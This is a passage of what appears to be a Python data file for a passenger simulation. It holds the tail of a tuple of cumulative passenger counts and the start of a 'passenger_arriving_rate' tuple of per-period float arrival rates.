(1896, 1666, 1583, 1671, 1406, 668, 681, 612, 731, 323, 251, 158, 0, 1888, 1640, 1276, 981, 1471, 824, 695, 522, 720, 567, 296, 158, 0), # 140
(1909, 1674, 1589, 1676, 1413, 675, 686, 618, 734, 323, 255, 158, 0, 1901, 1648, 1280, 983, 1477, 830, 699, 526, 721, 569, 297, 159, 0), # 141
(1922, 1685, 1601, 1690, 1424, 680, 688, 621, 737, 323, 257, 160, 0, 1913, 1658, 1283, 990, 1486, 836, 707, 528, 726, 575, 301, 160, 0), # 142
(1939, 1689, 1615, 1698, 1434, 686, 689, 626, 743, 324, 257, 162, 0, 1931, 1667, 1291, 996, 1498, 840, 712, 529, 732, 579, 305, 161, 0), # 143
(1951, 1702, 1626, 1708, 1439, 688, 693, 627, 750, 328, 259, 162, 0, 1940, 1675, 1297, 1002, 1506, 845, 715, 531, 735, 580, 307, 163, 0), # 144
(1957, 1716, 1635, 1716, 1447, 692, 696, 630, 753, 329, 263, 162, 0, 1959, 1686, 1306, 1005, 1520, 850, 720, 535, 737, 582, 311, 165, 0), # 145
(1970, 1724, 1650, 1727, 1454, 695, 696, 632, 762, 330, 264, 163, 0, 1974, 1697, 1317, 1012, 1533, 862, 722, 536, 739, 582, 314, 165, 0), # 146
(1981, 1734, 1661, 1738, 1464, 700, 699, 634, 763, 333, 264, 164, 0, 1987, 1708, 1326, 1018, 1542, 868, 726, 539, 741, 583, 314, 165, 0), # 147
(1993, 1737, 1670, 1748, 1485, 707, 701, 640, 768, 333, 266, 165, 0, 1996, 1717, 1329, 1026, 1553, 871, 729, 543, 746, 587, 314, 165, 0), # 148
(2005, 1744, 1670, 1760, 1495, 716, 705, 641, 772, 334, 267, 167, 0, 2008, 1730, 1339, 1030, 1560, 873, 732, 545, 754, 591, 317, 165, 0), # 149
(2012, 1753, 1679, 1768, 1508, 719, 709, 644, 774, 335, 271, 167, 0, 2021, 1739, 1349, 1034, 1569, 875, 734, 550, 759, 593, 322, 167, 0), # 150
(2021, 1767, 1688, 1778, 1520, 721, 711, 647, 780, 337, 272, 168, 0, 2032, 1749, 1358, 1041, 1577, 880, 736, 553, 759, 600, 323, 167, 0), # 151
(2032, 1780, 1700, 1784, 1528, 725, 717, 654, 786, 339, 273, 168, 0, 2042, 1760, 1366, 1049, 1582, 887, 740, 558, 764, 601, 324, 169, 0), # 152
(2048, 1784, 1706, 1797, 1538, 732, 719, 657, 792, 343, 274, 168, 0, 2052, 1771, 1371, 1054, 1590, 890, 746, 562, 769, 604, 326, 169, 0), # 153
(2062, 1792, 1715, 1805, 1547, 734, 721, 660, 796, 345, 277, 168, 0, 2066, 1782, 1375, 1060, 1599, 895, 751, 566, 771, 606, 326, 169, 0), # 154
(2065, 1797, 1722, 1809, 1551, 740, 725, 668, 804, 345, 277, 169, 0, 2079, 1787, 1379, 1068, 1606, 900, 756, 567, 774, 607, 327, 170, 0), # 155
(2071, 1806, 1738, 1823, 1560, 744, 729, 670, 808, 346, 277, 169, 0, 2090, 1795, 1382, 1071, 1612, 903, 763, 571, 778, 611, 331, 170, 0), # 156
(2077, 1821, 1752, 1832, 1573, 749, 731, 671, 813, 349, 279, 169, 0, 2104, 1803, 1390, 1079, 1625, 908, 766, 571, 783, 612, 334, 170, 0), # 157
(2089, 1827, 1763, 1845, 1581, 753, 733, 672, 816, 353, 282, 171, 0, 2113, 1815, 1400, 1083, 1637, 910, 768, 577, 786, 615, 336, 170, 0), # 158
(2097, 1834, 1768, 1856, 1587, 759, 735, 673, 822, 354, 284, 172, 0, 2122, 1825, 1405, 1087, 1645, 915, 772, 579, 791, 619, 339, 171, 0), # 159
(2102, 1841, 1772, 1860, 1592, 764, 737, 675, 834, 356, 286, 172, 0, 2129, 1833, 1412, 1091, 1654, 919, 776, 583, 798, 624, 340, 171, 0), # 160
(2110, 1847, 1786, 1867, 1603, 771, 740, 677, 839, 359, 286, 173, 0, 2137, 1841, 1416, 1098, 1672, 922, 780, 586, 800, 628, 345, 172, 0), # 161
(2114, 1853, 1796, 1879, 1613, 777, 744, 682, 842, 361, 287, 174, 0, 2149, 1850, 1422, 1104, 1681, 926, 783, 590, 805, 629, 349, 172, 0), # 162
(2122, 1861, 1801, 1893, 1619, 781, 746, 687, 842, 364, 289, 175, 0, 2157, 1859, 1426, 1107, 1688, 930, 785, 592, 808, 630, 350, 172, 0), # 163
(2131, 1871, 1810, 1905, 1625, 786, 749, 690, 844, 365, 289, 176, 0, 2164, 1869, 1431, 1113, 1697, 933, 791, 598, 813, 633, 351, 172, 0), # 164
(2141, 1877, 1821, 1916, 1635, 791, 754, 692, 846, 367, 291, 176, 0, 2173, 1876, 1437, 1119, 1707, 937, 792, 602, 816, 635, 351, 175, 0), # 165
(2150, 1888, 1832, 1924, 1647, 793, 758, 692, 850, 368, 291, 177, 0, 2187, 1881, 1443, 1123, 1712, 945, 795, 602, 819, 636, 354, 176, 0), # 166
(2159, 1894, 1837, 1932, 1659, 802, 760, 693, 856, 369, 292, 178, 0, 2201, 1886, 1445, 1127, 1724, 950, 798, 604, 824, 638, 355, 177, 0), # 167
(2168, 1899, 1843, 1943, 1666, 806, 762, 693, 861, 370, 296, 179, 0, 2213, 1890, 1451, 1132, 1725, 956, 799, 608, 828, 639, 356, 177, 0), # 168
(2179, 1904, 1848, 1950, 1677, 808, 763, 697, 863, 372, 297, 181, 0, 2223, 1902, 1456, 1132, 1730, 959, 801, 610, 831, 642, 358, 178, 0), # 169
(2184, 1907, 1855, 1960, 1685, 810, 764, 697, 865, 376, 298, 183, 0, 2226, 1909, 1461, 1136, 1737, 961, 802, 611, 831, 644, 358, 178, 0), # 170
(2195, 1913, 1864, 1971, 1690, 813, 767, 698, 867, 376, 299, 183, 0, 2235, 1913, 1468, 1140, 1746, 964, 802, 612, 833, 645, 359, 178, 0), # 171
(2204, 1920, 1872, 1978, 1699, 815, 768, 702, 870, 378, 301, 183, 0, 2238, 1918, 1473, 1144, 1749, 966, 804, 614, 836, 646, 359, 178, 0), # 172
(2215, 1925, 1881, 1987, 1702, 816, 768, 703, 878, 380, 302, 184, 0, 2243, 1922, 1482, 1144, 1755, 969, 805, 615, 842, 651, 360, 178, 0), # 173
(2219, 1931, 1886, 1997, 1707, 821, 770, 705, 881, 382, 302, 184, 0, 2251, 1929, 1486, 1149, 1763, 971, 806, 615, 845, 654, 360, 179, 0), # 174
(2224, 1933, 1890, 2001, 1712, 821, 774, 709, 886, 382, 303, 184, 0, 2259, 1934, 1493, 1153, 1769, 974, 808, 620, 848, 654, 361, 179, 0), # 175
(2229, 1942, 1900, 2006, 1713, 822, 775, 712, 890, 384, 304, 185, 0, 2264, 1936, 1495, 1156, 1774, 976, 808, 621, 850, 655, 363, 180, 0), # 176
(2232, 1945, 1908, 2013, 1717, 826, 775, 714, 890, 385, 304, 186, 0, 2272, 1943, 1498, 1162, 1781, 979, 810, 624, 853, 657, 364, 180, 0), # 177
(2233, 1948, 1912, 2019, 1722, 828, 776, 717, 895, 386, 304, 187, 0, 2276, 1951, 1506, 1169, 1788, 982, 812, 627, 856, 660, 364, 180, 0), # 178
(2233, 1948, 1912, 2019, 1722, 828, 776, 717, 895, 386, 304, 187, 0, 2276, 1951, 1506, 1169, 1788, 982, 812, 627, 856, 660, 364, 180, 0), # 179
)
passenger_arriving_rate = (
(7.029211809720476, 7.090786984939564, 6.079830434547925, 6.525401162556605, 5.184373233768971, 2.563234861163827, 2.9022249307617405, 2.7143527675713304, 2.8420462290117365, 1.3853052554328298, 0.9812285382399741, 0.571423425802387, 0.0, 7.117432297609708, 6.285657683826256, 4.90614269119987, 4.155915766298489, 5.684092458023473, 3.8000938745998627, 2.9022249307617405, 1.8308820436884476, 2.5921866168844856, 2.175133720852202, 1.2159660869095852, 0.6446169986308695, 0.0), # 0
(7.496058012827964, 7.558911224152441, 6.4812376898851785, 6.956401465940448, 5.527657648309288, 2.7325532603014207, 3.093628258884586, 2.893049671694997, 3.0297144856220246, 1.4766432422970026, 1.0460557650564308, 0.6091419437616749, 0.0, 7.587708306415797, 6.700561381378422, 5.230278825282154, 4.429929726891007, 6.059428971244049, 4.050269540372995, 3.093628258884586, 1.9518237573581576, 2.763828824154644, 2.3188004886468163, 1.2962475379770357, 0.687173747650222, 0.0), # 1
(7.9614122125716245, 8.025177635976757, 6.881049333138649, 7.385687089898034, 5.869698775499761, 2.9011961768518306, 3.284272955572493, 3.071031394610912, 3.2166338432095234, 1.5676198212571917, 1.1106254013811399, 0.6467104760728565, 0.0, 8.056110759493567, 7.113815236801421, 5.553127006905699, 4.702859463771574, 6.433267686419047, 4.2994439524552766, 3.284272955572493, 2.0722829834655934, 2.9348493877498805, 2.4618956966326784, 1.37620986662773, 0.7295616032706144, 0.0), # 2
(8.423460910405188, 8.487736310818441, 7.277679347539831, 7.811555227908678, 6.209150897601775, 3.0684948417778424, 3.473402549153569, 3.2475923418717962, 3.4020630750965104, 1.657873944449164, 1.1746812960930562, 0.6839799965752206, 0.0, 8.520781928755916, 7.523779962327425, 5.873406480465281, 4.97362183334749, 6.804126150193021, 4.5466292786205145, 3.473402549153569, 2.191782029841316, 3.1045754488008876, 2.6038517426362264, 1.455535869507966, 0.7716123918925856, 0.0), # 3
(8.880390607782374, 8.94473733908341, 7.669541716320211, 8.232303073451698, 6.5446682968767265, 3.233780486042246, 3.6602605679559215, 3.4220269190303676, 3.585260954605263, 1.7470445640086882, 1.2379672980711345, 0.7208014791080559, 0.0, 8.979864086115745, 7.928816270188614, 6.189836490355671, 5.241133692026064, 7.170521909210526, 4.790837686642515, 3.6602605679559215, 2.30984320431589, 3.2723341484383632, 2.7441010244839, 1.5339083432640421, 0.8131579399166738, 0.0), # 4
(9.330387806156915, 9.394330811177607, 8.055050422711272, 8.646227820006413, 6.874905255585995, 3.396384340607826, 3.844090540307657, 3.593629531639346, 3.765486255058061, 1.8347706320715327, 1.300227256194331, 0.7570258975106506, 0.0, 9.43149950348596, 8.327284872617156, 6.501136280971655, 5.504311896214597, 7.530972510116122, 5.031081344295084, 3.844090540307657, 2.4259888147198754, 3.4374526277929975, 2.8820759400021383, 1.6110100845422546, 0.8540300737434189, 0.0), # 5
(9.771639006982534, 9.834666817506942, 8.43261944994451, 9.051626661052135, 7.198516055990973, 3.5556376364373725, 4.024135994536884, 3.7616945852514516, 3.9419977497771805, 1.920691100773466, 1.3612050193415997, 0.7925042256222944, 0.0, 9.87383045277945, 8.717546481845236, 6.806025096707997, 5.762073302320396, 7.883995499554361, 5.266372419352033, 4.024135994536884, 2.5397411688838374, 3.5992580279954867, 3.017208887017379, 1.6865238899889023, 0.8940606197733586, 0.0), # 6
(10.202330711712957, 10.263895448477353, 8.800662781251408, 9.446796790068186, 7.514154980353052, 3.710871604493673, 4.19964045897171, 3.9255164854194056, 4.1140542120849, 2.004444922250256, 1.4206444363918964, 0.8270874372822752, 0.0, 10.304999205909127, 9.097961810105026, 7.103222181959481, 6.013334766750766, 8.2281084241698, 5.495723079587168, 4.19964045897171, 2.6506225746383376, 3.757077490176526, 3.148932263356063, 1.7601325562502819, 0.9330814044070321, 0.0), # 7
(10.62064942180191, 10.68016679449476, 9.157594399863463, 9.830035400533875, 7.820476310933614, 3.8614174757395103, 4.369847461940239, 4.0843896376959234, 4.280914415303496, 2.0856710486376717, 1.4782893562241752, 0.8606265063298821, 0.0, 10.723148034787885, 9.466891569628702, 7.391446781120876, 6.257013145913014, 8.561828830606991, 5.718145492774292, 4.369847461940239, 2.758155339813936, 3.910238155466807, 3.276678466844626, 1.831518879972693, 0.9709242540449783, 0.0), # 8
(11.02478163870312, 11.081630945965095, 9.501828289012156, 10.199639685928528, 8.116134329994049, 4.006606481137679, 4.534000531770584, 4.237608447633729, 4.441837132755248, 2.1640084320714803, 1.5338836277173917, 0.8929724066044035, 0.0, 11.126419211328628, 9.822696472648436, 7.669418138586958, 6.49202529621444, 8.883674265510496, 5.932651826687221, 4.534000531770584, 2.861861772241199, 4.058067164997024, 3.3998798953095104, 1.9003656578024313, 1.0074209950877362, 0.0), # 9
(11.412913863870306, 11.46643799329428, 9.83177843192898, 10.553906839731454, 8.399783319795748, 4.145769851650964, 4.691343196790848, 4.38446732078554, 4.596081137762433, 2.2390960246874507, 1.5871710997505006, 0.923976111945128, 0.0, 11.512955007444255, 10.163737231396405, 7.935855498752503, 6.717288074062351, 9.192162275524867, 6.138254249099756, 4.691343196790848, 2.961264179750688, 4.199891659897874, 3.517968946577152, 1.9663556863857963, 1.0424034539358438, 0.0), # 10
(11.783232598757209, 11.832738026888249, 10.145858811845418, 10.891134055421968, 8.670077562600099, 4.278238818242151, 4.841118985329142, 4.524260662704076, 4.7429052036473305, 2.3105727786213524, 1.6378956212024585, 0.9534885961913449, 0.0, 11.880897695047656, 10.488374558104791, 8.189478106012292, 6.931718335864056, 9.485810407294661, 6.333964927785706, 4.841118985329142, 3.055884870172965, 4.3350387813000495, 3.63037801847399, 2.0291717623690837, 1.075703456989841, 0.0), # 11
(12.133924344817538, 12.178681137152912, 10.442483411992965, 11.209618526479394, 8.925671340668487, 4.403344611874027, 4.9825714257135685, 4.656282878942054, 4.881568103732217, 2.378077646008951, 1.6858010409522184, 0.9813608331823415, 0.0, 12.22838954605175, 10.794969165005755, 8.429005204761092, 7.134232938026852, 9.763136207464434, 6.518796030518876, 4.9825714257135685, 3.1452461513385908, 4.462835670334243, 3.7365395088264655, 2.0884966823985933, 1.107152830650265, 0.0), # 12
(12.463175603505027, 12.502417414494213, 10.720066215603106, 11.507657446383048, 9.165218936262296, 4.520418463509383, 5.11494404627224, 4.779828375052198, 5.011328611339368, 2.441249578986017, 1.7306312078787365, 1.0074437967574077, 0.0, 12.55357283236943, 11.08188176433148, 8.653156039393682, 7.323748736958049, 10.022657222678736, 6.691759725073078, 5.11494404627224, 3.228870331078131, 4.582609468131148, 3.8358858154610167, 2.1440132431206216, 1.136583401317656, 0.0), # 13
(12.769172876273403, 12.802096949318072, 10.977021205907338, 11.783548008612232, 9.387374631642924, 4.6287916041110035, 5.237480375333263, 4.894191556587227, 5.131445499791063, 2.4997275296883177, 1.7721299708609668, 1.0315884607558323, 0.0, 12.85458982591359, 11.347473068314153, 8.860649854304834, 7.499182589064952, 10.262890999582126, 6.8518681792221185, 5.237480375333263, 3.306279717222145, 4.693687315821462, 3.9278493362040785, 2.195404241181468, 1.1638269953925522, 0.0), # 14
(13.050102664576398, 13.075869832030413, 11.211762366137135, 12.035587406646286, 9.590792709071755, 4.72779526464168, 5.349423941224739, 4.998666829099858, 5.241177542409583, 2.5531504502516222, 1.810041178777865, 1.0536457990169035, 0.0, 13.129582798597134, 11.590103789185937, 9.050205893889325, 7.659451350754866, 10.482355084819165, 6.998133560739801, 5.349423941224739, 3.3769966176011996, 4.795396354535877, 4.0118624688820965, 2.242352473227427, 1.1887154392754924, 0.0), # 15
(13.30415146986772, 13.321886153037171, 11.422703679523998, 12.262072833964503, 9.774127450810177, 4.816760676064193, 5.450018272274784, 5.092548598142811, 5.339783512517201, 2.6011572928116995, 1.8441086805083868, 1.0734667853799098, 0.0, 13.376694022332964, 11.808134639179006, 9.220543402541933, 7.803471878435097, 10.679567025034402, 7.1295680373999355, 5.450018272274784, 3.440543340045852, 4.887063725405088, 4.087357611321502, 2.2845407359047996, 1.2110805593670158, 0.0), # 16
(13.529505793601107, 13.538296002744264, 11.608259129299412, 12.46130148404622, 9.936033139119584, 4.895019069341334, 5.538506896811498, 5.17513126926881, 5.426522183436193, 2.643387009504314, 1.874076324931487, 1.09090239368414, 0.0, 13.594065769033982, 11.999926330525538, 9.370381624657433, 7.9301610285129405, 10.853044366872385, 7.245183776976335, 5.538506896811498, 3.496442192386667, 4.968016569559792, 4.153767161348741, 2.3216518258598824, 1.2307541820676606, 0.0), # 17
(13.724352137230287, 13.723249471557619, 11.766842698694862, 12.631570550370744, 10.07516405626135, 4.961901675435895, 5.6141333431629965, 5.245709248030569, 5.500652328488845, 2.6794785524652385, 1.8996879609261188, 1.1058035977688838, 0.0, 13.779840310613086, 12.163839575457718, 9.498439804630594, 8.038435657395715, 11.00130465697769, 7.343992947242797, 5.6141333431629965, 3.5442154824542103, 5.037582028130675, 4.210523516790249, 2.3533685397389728, 1.2475681337779656, 0.0), # 18
(13.88687700220898, 13.874896649883173, 11.896868370941842, 12.77117722641738, 10.190174484496875, 5.0167397253106545, 5.676141139657377, 5.30357693998081, 5.561432720997431, 2.7090708738302403, 1.9206874373712384, 1.1180213714734282, 0.0, 13.932159918983176, 12.298235086207708, 9.603437186856192, 8.12721262149072, 11.122865441994861, 7.425007715973134, 5.676141139657377, 3.5833855180790386, 5.095087242248438, 4.257059075472461, 2.379373674188369, 1.2613542408984704, 0.0), # 19
(14.015266889990915, 13.991387628126835, 11.996750129271838, 12.87841870566547, 10.279718706087547, 5.058864449928407, 5.723773814622755, 5.348028750672253, 5.608122134284226, 2.731802925735086, 1.936818603145802, 1.1274066886370624, 0.0, 14.049166866057154, 12.401473575007685, 9.68409301572901, 8.195408777205257, 11.216244268568452, 7.487240250941153, 5.723773814622755, 3.6134746070917196, 5.139859353043773, 4.292806235221825, 2.399350025854368, 1.2719443298297126, 0.0), # 20
(14.107708302029813, 14.070872496694552, 12.064901956916339, 12.951592181594311, 10.34245100329475, 5.087607080251938, 5.756274896387231, 5.378359085657614, 5.63997934167151, 2.747313660315545, 1.9478253071287643, 1.133810523099076, 0.0, 14.12900342374791, 12.471915754089835, 9.739126535643821, 8.241940980946634, 11.27995868334302, 7.529702719920659, 5.756274896387231, 3.634005057322813, 5.171225501647375, 4.317197393864771, 2.412980391383268, 1.279170226972232, 0.0), # 21
(14.162387739779412, 14.111501345992236, 12.099737837106835, 12.988994847683228, 10.377025658379871, 5.102298847244033, 5.77288791327892, 5.393862350489618, 5.656263116481561, 2.7552420297073854, 1.9534513981990798, 1.1370838486987573, 0.0, 14.16981186396836, 12.50792233568633, 9.7672569909954, 8.265726089122154, 11.312526232963123, 7.551407290685465, 5.77288791327892, 3.644499176602881, 5.188512829189936, 4.329664949227744, 2.419947567421367, 1.282863758726567, 0.0), # 22
(14.182550708679697, 14.116311945587563, 12.104077046181986, 12.993677353395064, 10.385883252297091, 5.104166666666667, 5.774862801581538, 5.395538065843622, 5.658298909465021, 2.7561772953818022, 1.9541568753377396, 1.1374880506020426, 0.0, 14.175, 12.512368556622466, 9.770784376688697, 8.268531886145405, 11.316597818930042, 7.553753292181072, 5.774862801581538, 3.6458333333333335, 5.192941626148546, 4.331225784465023, 2.4208154092363974, 1.283301085962506, 0.0), # 23
(14.197417378247815, 14.113505864197531, 12.10336728395062, 12.99310104166667, 10.390900439373862, 5.104166666666667, 5.773777668845317, 5.393208333333334, 5.658026111111111, 2.755602716049383, 1.9540790684624023, 1.1373934156378602, 0.0, 14.175, 12.51132757201646, 9.77039534231201, 8.266808148148147, 11.316052222222222, 7.550491666666668, 5.773777668845317, 3.6458333333333335, 5.195450219686931, 4.331033680555557, 2.4206734567901242, 1.2830459876543212, 0.0), # 24
(14.211970122296213, 14.10797467992684, 12.101966163694561, 12.991960841049384, 10.39580728255487, 5.104166666666667, 5.771639231824418, 5.388631687242799, 5.657487139917696, 2.754471593507088, 1.9539247931994848, 1.1372065996037193, 0.0, 14.175, 12.509272595640908, 9.769623965997424, 8.263414780521263, 11.314974279835392, 7.544084362139919, 5.771639231824418, 3.6458333333333335, 5.197903641277435, 4.330653613683129, 2.4203932327389124, 1.2825431527206221, 0.0), # 25
(14.226207826667249, 14.099802892089624, 12.099892889803387, 12.990269714506173, 10.400603610526364, 5.104166666666667, 5.768480702816105, 5.381894547325103, 5.65668890946502, 2.7528027480566992, 1.9536954462318665, 1.136930163084896, 0.0, 14.175, 12.506231793933855, 9.768477231159332, 8.258408244170097, 11.31337781893004, 7.534652366255146, 5.768480702816105, 3.6458333333333335, 5.200301805263182, 4.330089904835392, 2.4199785779606775, 1.2818002629172387, 0.0), # 26
(14.240129377203292, 14.089075, 12.097166666666668, 12.988040625, 10.405289251974601, 5.104166666666667, 5.7643352941176484, 5.3730833333333345, 5.655638333333333, 2.7506150000000003, 1.9533924242424245, 1.1365666666666672, 0.0, 14.175, 12.502233333333336, 9.766962121212122, 8.251845, 11.311276666666666, 7.5223166666666685, 5.7643352941176484, 3.6458333333333335, 5.2026446259873005, 4.329346875000001, 2.4194333333333335, 1.280825, 0.0), # 27
(14.253733659746702, 14.075875502972108, 12.093806698673983, 12.985286535493827, 10.40986403558584, 5.104166666666667, 5.759236218026306, 5.362284465020577, 5.654342325102881, 2.7479271696387753, 1.9530171239140377, 1.1361186709343092, 0.0, 14.175, 12.4973053802774, 9.765085619570188, 8.243781508916324, 11.308684650205763, 7.507198251028808, 5.759236218026306, 3.6458333333333335, 5.20493201779292, 4.32842884516461, 2.418761339734797, 1.2796250457247373, 0.0), # 28
(14.26701956013985, 14.060288900320074, 12.089832190214908, 12.982020408950618, 10.41432779004634, 5.104166666666667, 5.753216686839346, 5.349584362139918, 5.652807798353909, 2.7447580772748066, 1.952570941929584, 1.1355887364730988, 0.0, 14.175, 12.491476101204084, 9.76285470964792, 8.234274231824418, 11.305615596707819, 7.489418106995886, 5.753216686839346, 3.6458333333333335, 5.20716389502317, 4.327340136316874, 2.4179664380429817, 1.2782080818472796, 0.0), # 29
(14.279985964225098, 14.042399691358026, 12.085262345679013, 12.978255208333334, 10.418680344042354, 5.104166666666667, 5.746309912854031, 5.335069444444444, 5.651041666666666, 2.7411265432098775, 1.952055274971942, 1.1349794238683129, 0.0, 14.175, 12.48477366255144, 9.760276374859709, 8.223379629629632, 11.302083333333332, 7.469097222222222, 5.746309912854031, 3.6458333333333335, 5.209340172021177, 4.326085069444446, 2.4170524691358026, 1.276581790123457, 0.0), # 30
(14.292631757844802, 14.022292375400093, 12.080116369455878, 12.97400389660494, 10.422921526260142, 5.104166666666667, 5.7385491083676285, 5.318826131687244, 5.649050843621399, 2.737051387745771, 1.9514715197239891, 1.1342932937052284, 0.0, 14.175, 12.477226230757509, 9.757357598619945, 8.211154163237312, 11.298101687242799, 7.4463565843621415, 5.7385491083676285, 3.6458333333333335, 5.211460763130071, 4.324667965534981, 2.416023273891176, 1.2747538523090995, 0.0), # 31
(14.304955826841338, 14.000051451760402, 12.07441346593507, 12.969279436728398, 10.427051165385956, 5.104166666666667, 5.7299674856774, 5.3009408436214, 5.646842242798354, 2.7325514311842714, 1.950821072868604, 1.1335329065691209, 0.0, 14.175, 12.468861972260328, 9.754105364343019, 8.197654293552812, 11.293684485596708, 7.421317181069961, 5.7299674856774, 3.6458333333333335, 5.213525582692978, 4.3230931455761334, 2.4148826931870144, 1.272731950160037, 0.0), # 32
(14.316957057057056, 13.975761419753086, 12.068172839506175, 12.964094791666666, 10.431069090106059, 5.104166666666667, 5.720598257080611, 5.2815, 5.644422777777778, 2.7276454938271613, 1.9501053310886647, 1.1327008230452675, 0.0, 14.175, 12.459709053497942, 9.750526655443322, 8.182936481481482, 11.288845555555556, 7.394100000000001, 5.720598257080611, 3.6458333333333335, 5.215534545053029, 4.321364930555556, 2.413634567901235, 1.2705237654320989, 0.0), # 33
(14.328634334334335, 13.949506778692271, 12.061413694558757, 12.958462924382715, 10.434975129106702, 5.104166666666667, 5.710474634874527, 5.260590020576132, 5.641799362139919, 2.7223523959762237, 1.9493256910670491, 1.1317996037189455, 0.0, 14.175, 12.449795640908398, 9.746628455335244, 8.16705718792867, 11.283598724279837, 7.3648260288065845, 5.710474634874527, 3.6458333333333335, 5.217487564553351, 4.319487641460906, 2.4122827389117516, 1.2681369798811157, 0.0), # 34
(14.339986544515531, 13.92137202789209, 12.054155235482398, 12.952396797839505, 10.438769111074146, 5.104166666666667, 5.699629831356412, 5.238297325102881, 5.638978909465021, 2.7166909579332423, 1.9484835494866362, 1.1308318091754308, 0.0, 14.175, 12.439149900929737, 9.74241774743318, 8.150072873799726, 11.277957818930043, 7.333616255144034, 5.699629831356412, 3.6458333333333335, 5.219384555537073, 4.317465599279836, 2.41083104709648, 1.2655792752629174, 0.0), # 35
(14.35101257344301, 13.891441666666665, 12.04641666666667, 12.945909375, 10.442450864694647, 5.104166666666667, 5.68809705882353, 5.214708333333334, 5.635968333333333, 2.7106800000000004, 1.9475803030303034, 1.1298000000000004, 0.0, 14.175, 12.427800000000001, 9.737901515151515, 8.13204, 11.271936666666665, 7.300591666666668, 5.68809705882353, 3.6458333333333335, 5.221225432347324, 4.315303125000001, 2.409283333333334, 1.2628583333333334, 0.0), # 36
(14.361711306959135, 13.859800194330132, 12.038217192501145, 12.939013618827161, 10.44602021865446, 5.104166666666667, 5.675909529573146, 5.189909465020577, 5.632774547325103, 2.7043383424782816, 1.9466173483809293, 1.1287067367779304, 0.0, 14.175, 12.415774104557233, 9.733086741904645, 8.113015027434844, 11.265549094650206, 7.265873251028808, 5.675909529573146, 3.6458333333333335, 5.22301010932723, 4.313004539609055, 2.407643438500229, 1.259981835848194, 0.0), # 37
(14.372081630906267, 13.826532110196618, 12.029576017375401, 12.931722492283953, 10.449477001639845, 5.104166666666667, 5.663100455902526, 5.1639871399176975, 5.629404465020576, 2.6976848056698683, 1.9455960822213911, 1.1275545800944982, 0.0, 14.175, 12.403100381039478, 9.727980411106955, 8.093054417009604, 11.258808930041152, 7.229581995884776, 5.663100455902526, 3.6458333333333335, 5.224738500819923, 4.3105741640946516, 2.40591520347508, 1.2569574645633292, 0.0), # 38
(14.382122431126781, 13.791721913580247, 12.020512345679016, 12.924048958333334, 10.452821042337057, 5.104166666666667, 5.649703050108934, 5.137027777777778, 5.625865000000001, 2.690738209876544, 1.9445179012345684, 1.1263460905349796, 0.0, 14.175, 12.389806995884772, 9.722589506172842, 8.07221462962963, 11.251730000000002, 7.191838888888889, 5.649703050108934, 3.6458333333333335, 5.226410521168528, 4.308016319444445, 2.4041024691358035, 1.253792901234568, 0.0), # 39
(14.39183259346303, 13.755454103795152, 12.011045381801555, 12.916005979938273, 10.45605216943235, 5.104166666666667, 5.635750524489632, 5.1091177983539104, 5.622163065843623, 2.6835173754000925, 1.943384202103338, 1.125083828684652, 0.0, 14.175, 12.375922115531171, 9.71692101051669, 8.050552126200277, 11.244326131687245, 7.1527649176954755, 5.635750524489632, 3.6458333333333335, 5.228026084716175, 4.305335326646092, 2.4022090763603114, 1.2504958276177414, 0.0), # 40
(14.40121100375738, 13.717813180155463, 12.001194330132604, 12.90760652006173, 10.459170211611989, 5.104166666666667, 5.621276091341887, 5.080343621399178, 5.618305576131687, 2.676041122542296, 1.9421963815105796, 1.1237703551287916, 0.0, 14.175, 12.361473906416705, 9.710981907552897, 8.028123367626886, 11.236611152263373, 7.112481069958849, 5.621276091341887, 3.6458333333333335, 5.229585105805994, 4.302535506687244, 2.400238866026521, 1.2470739254686787, 0.0), # 41
(14.410256547852201, 13.678883641975311, 11.990978395061731, 12.89886354166667, 10.462174997562222, 5.104166666666667, 5.6063129629629636, 5.050791666666668, 5.614299444444446, 2.668328271604939, 1.9409558361391697, 1.122408230452675, 0.0, 14.175, 12.346490534979424, 9.704779180695848, 8.004984814814815, 11.228598888888891, 7.071108333333335, 5.6063129629629636, 3.6458333333333335, 5.231087498781111, 4.299621180555557, 2.3981956790123466, 1.2435348765432102, 0.0), # 42
(14.418968111589852, 13.638749988568819, 11.980416780978512, 12.889790007716051, 10.46506635596931, 5.104166666666667, 5.5908943516501255, 5.020548353909466, 5.61015158436214, 2.660397642889804, 1.9396639626719878, 1.1210000152415793, 0.0, 14.175, 12.331000167657372, 9.698319813359937, 7.981192928669412, 11.22030316872428, 7.0287676954732525, 5.5908943516501255, 3.6458333333333335, 5.232533177984655, 4.296596669238685, 2.3960833561957027, 1.2398863625971654, 0.0), # 43
(14.427344580812699, 13.597496719250115, 11.969528692272522, 12.880398881172843, 10.467844115519508, 5.104166666666667, 5.575053469700638, 4.98970010288066, 5.605868909465021, 2.652268056698675, 1.938322157791911, 1.1195482700807806, 0.0, 14.175, 12.315030970888586, 9.691610788959554, 7.9568041700960235, 11.211737818930041, 6.985580144032924, 5.575053469700638, 3.6458333333333335, 5.233922057759754, 4.293466293724282, 2.3939057384545044, 1.2361360653863744, 0.0), # 44
(14.435384841363105, 13.555208333333335, 11.958333333333336, 12.870703125000002, 10.470508104899077, 5.104166666666667, 5.558823529411765, 4.958333333333334, 5.601458333333333, 2.6439583333333343, 1.9369318181818187, 1.1180555555555556, 0.0, 14.175, 12.29861111111111, 9.684659090909092, 7.931875000000002, 11.202916666666667, 6.941666666666667, 5.558823529411765, 3.6458333333333335, 5.235254052449538, 4.290234375000002, 2.391666666666667, 1.232291666666667, 0.0), # 45
(14.443087779083434, 13.511969330132603, 11.946849908550526, 12.860715702160494, 10.47305815279427, 5.104166666666667, 5.542237743080772, 4.926534465020577, 5.596926769547324, 2.635487293095565, 1.9354943405245877, 1.1165244322511814, 0.0, 14.175, 12.281768754762993, 9.677471702622938, 7.906461879286693, 11.193853539094649, 6.897148251028808, 5.542237743080772, 3.6458333333333335, 5.236529076397135, 4.286905234053499, 2.3893699817101055, 1.228360848193873, 0.0), # 46
(14.45045227981605, 13.46786420896205, 11.935097622313673, 12.850449575617287, 10.475494087891343, 5.104166666666667, 5.525329323004923, 4.894389917695474, 5.592281131687244, 2.6268737562871523, 1.9340111215030973, 1.1149574607529342, 0.0, 14.175, 12.264532068282275, 9.670055607515485, 7.880621268861455, 11.184562263374488, 6.852145884773663, 5.525329323004923, 3.6458333333333335, 5.237747043945672, 4.283483191872429, 2.387019524462735, 1.2243512917238228, 0.0), # 47
